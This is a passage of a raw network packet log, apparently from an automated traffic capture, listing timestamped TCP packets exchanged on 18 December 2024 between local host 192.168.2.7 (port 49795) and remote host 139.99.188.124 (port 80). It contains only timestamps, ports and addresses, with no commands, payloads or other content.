                                                                                        Dec 18, 2024 20:55:52.098136902 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.098143101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.098216057 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.099060059 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.099371910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.099463940 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.100361109 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.100367069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.100444078 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.101325035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.101337910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.101428032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.102282047 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.184880972 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.218986988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.219909906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.219933033 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.219938993 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.219983101 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.220025063 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.220895052 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.220902920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.220949888 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.221868992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.221875906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.221970081 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.222795963 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.222804070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.222860098 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.223844051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.223858118 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.223910093 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.224741936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.224757910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.224806070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.240132093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.240267992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.240350008 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.241300106 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.241307974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.241358995 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.242232084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.242706060 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.242953062 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.243257999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.243525982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.243614912 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.244308949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.244415045 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.244575977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.244923115 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.245229006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.245337009 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.245659113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.245671988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.245728970 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.246639013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.246646881 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.246695995 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.246998072 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.247005939 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.247059107 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.247849941 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.247857094 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.247945070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.248878956 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.248886108 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.248929977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.249674082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.249681950 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.249737978 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.251192093 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.251204014 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.251250029 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.251410961 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.251425982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.251492977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.251996994 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.252242088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.252305984 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.253001928 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.253009081 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.253086090 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.253981113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.253987074 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.254065037 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.254760981 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.255040884 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.255112886 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.255628109 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.255961895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.256052017 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.256567001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.256783009 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.256875038 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.257488966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.257647038 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.257769108 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.258282900 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.259150982 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.259159088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.259216070 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.259360075 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.259464025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.260005951 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.260082006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.260133982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.260773897 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.260896921 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.260966063 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.261586905 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.261732101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.261785984 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.262547016 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.262826920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.262890100 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.263441086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.263556957 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.263638973 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.264281988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.264827967 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.264928102 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.265162945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.265379906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.265496016 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.266052961 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.267005920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.267014980 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.267072916 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.267321110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.267369986 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.269053936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.269061089 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.269162893 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.269908905 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.270996094 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.271089077 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.273464918 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.273472071 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.273538113 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.275329113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.275335073 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.275377035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.277637959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.277646065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.277739048 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.279582977 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.279597998 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.279685974 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.281477928 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.281486034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.281533957 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.283479929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.283485889 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.283557892 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.285408020 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.285413980 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.285480022 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.287422895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.287429094 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.287533045 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.290149927 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.290450096 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.290477991 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.290483952 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.290556908 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.290556908 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.291451931 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.291465998 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.291620970 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.292443037 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.293493986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.293571949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.293590069 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.365750074 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.416733027 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.417556047 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.417632103 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.417634010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.417643070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.417723894 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.418591022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.418622017 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.418673038 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.419567108 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.419605017 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.419615030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.419651985 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.420547009 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.420556068 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.420589924 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.421519995 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.421531916 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.421601057 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.422471046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.422540903 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.433523893 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.433842897 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.433918953 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.434096098 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.434109926 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.434319973 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.434966087 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.434978008 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.435024977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.436070919 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.436079979 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.436208010 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.436844110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.437057972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.437218904 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.437486887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.437691927 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.437752008 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.438390970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.438841105 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.438962936 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.439286947 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.439296007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.439343929 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.440184116 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.440203905 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.440264940 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.441210985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.441598892 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.441653967 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.441987038 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.441996098 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.442070961 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.442889929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.443106890 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.443176031 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.443696022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.443837881 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.443897963 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.444542885 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.445071936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.445141077 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.445491076 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.445919037 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.445972919 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.446400881 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.446410894 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.446482897 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.447338104 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.447396040 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.447474957 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.448149920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.448159933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.448241949 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.449070930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.449079990 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.449192047 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.450092077 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.450100899 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.450265884 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.451025009 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.451035023 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.451105118 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.451884985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.451894999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.451939106 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.453454018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.453464985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.453509092 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.454626083 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.454641104 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.454725981 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.455307007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.455326080 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.455334902 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.455393076 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.455595970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.455667019 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.456353903 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.456532001 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.456624985 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.457195997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.457314014 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.457406044 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.457892895 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.457971096 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.458043098 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.458744049 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.458899021 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.458997011 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.459659100 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.459815025 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.459954977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.460500956 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.460685015 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.460918903 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.461426973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.461551905 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.461699963 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.462295055 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.462305069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.462444067 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.463187933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.463526964 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.463855982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.464099884 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.464737892 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.464783907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.464958906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.465106964 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.465164900 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.465815067 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.466041088 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.466095924 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.466689110 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.466825008 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.466892004 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.467612028 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.467827082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.467885971 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.468457937 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.468875885 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.469312906 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.469356060 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.469571114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.469660997 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.470278025 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.470412016 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:52.470477104 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:52.471196890 CET8049795139.99.188.124192.168.2.7
